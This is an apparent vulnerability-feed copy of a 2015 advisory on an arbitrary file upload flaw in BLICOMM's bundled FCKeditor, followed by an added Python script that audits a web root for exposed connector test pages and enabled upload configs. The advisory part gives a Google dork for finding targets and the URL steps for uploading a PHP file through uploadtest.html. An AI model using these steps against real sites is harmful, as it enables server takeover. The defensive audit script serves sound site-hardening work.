BLICOMM (fckeditor) Arbitrary File Upload Vulnerability

CVE: (none listed)
Category: CWE-264
Price: Not specified
Severity: High
Author: Not specified
Risk: High
Exploitation Type: Remote
Date: 2015-04-11
CVSS: CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EPSS: 0.02192
EPSSP: 0.50148


Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2015040061

Below is a copy:

#######################################################
#BLICOMM (fckeditor) Arbitrary File Upload Vulnerability
#######################################################

############################################
# Exploit Title: BLICOMM (fckeditor)
# Google Dork : inurl:index.php?idLingua=2
# Date: 09/04/2015
# Author: Ashiyane Digital Security Team
# Vendor Homepage : http://blicomm.net
# Version: All Version
# Tested On : Windows 7 / Mozilla Firefox
############################################

########
#  exploit => includes/fckeditor/editor/filemanager/connectors/uploadtest.html
#
#  first go to => http://site.com/[path]
#
#  then => http://www.site.com/[path]/includes/fckeditor/editor/filemanager/connectors/uploadtest.html
#
#  select => Select the "File Uploader"> php ... upload to : Uploaded File URL:
########

[+][+][+][+][+][+][+][+][+][+][+][+]

 Discovered By : Cyb3r_Dr4in

[+][+][+][+][+][+][+][+][+][+][+][+]
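
For site owners checking their own deployment, the following added example (not part of the advisory or of BLICOMM/FCKeditor code) walks a web root and reports any FCKeditor connector test page, such as the `uploadtest.html` named above, together with any PHP connector `config.php` that sets `$Config['Enabled']` to true. The function names, the finding labels and the sample directory tree (including the `admin/fckeditor` copy) are assumptions constructed for illustration; `test.html` and the `php/config.php` switch are the stock FCKeditor 2.x layout.

```python
import os
import re
import tempfile

# uploadtest.html is the page named in the advisory; test.html ships beside it in FCKeditor 2.x.
TEST_PAGES = {"uploadtest.html", "test.html"}
CONNECTORS = "editor/filemanager/connectors"
# Matches an uncommented `$Config['Enabled'] = true` in the PHP connector's config.php.
ENABLED_RE = re.compile(r"^\s*\$Config\[\s*['\"]Enabled['\"]\s*\]\s*=\s*true\b", re.I | re.M)


def audit_webroot(webroot):
    """Return sorted (finding, relative_path) pairs for exposed FCKeditor upload surfaces."""
    findings = []
    for dirpath, _dirs, files in os.walk(webroot):
        rel_dir = os.path.relpath(dirpath, webroot).replace(os.sep, "/").lower()
        if CONNECTORS not in rel_dir:
            continue
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, webroot).replace(os.sep, "/")
            if name.lower() in TEST_PAGES:
                findings.append(("test-page-present", rel))
            elif name.lower() == "config.php":
                with open(full, encoding="utf-8", errors="replace") as fh:
                    if ENABLED_RE.search(fh.read()):
                        findings.append(("connector-enabled", rel))
    return sorted(findings)


def build_sample(root):
    """Constructed sample tree: one exposed editor copy, one hardened copy."""
    samples = {
        "includes/fckeditor/editor/filemanager/connectors/uploadtest.html": "<html></html>",
        "includes/fckeditor/editor/filemanager/connectors/php/config.php":
            "<?php\n$Config['Enabled'] = true ;\n",
        "admin/fckeditor/editor/filemanager/connectors/php/config.php":
            "<?php\n// $Config['Enabled'] = true ;\n$Config['Enabled'] = false ;\n",
    }
    for rel, body in samples.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample(tmp)
        for finding, path in audit_webroot(tmp):
            print(f"{finding}: {path}")
```

Any finding means the test page should be deleted from the web root and the connector left disabled unless it sits behind authentication.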

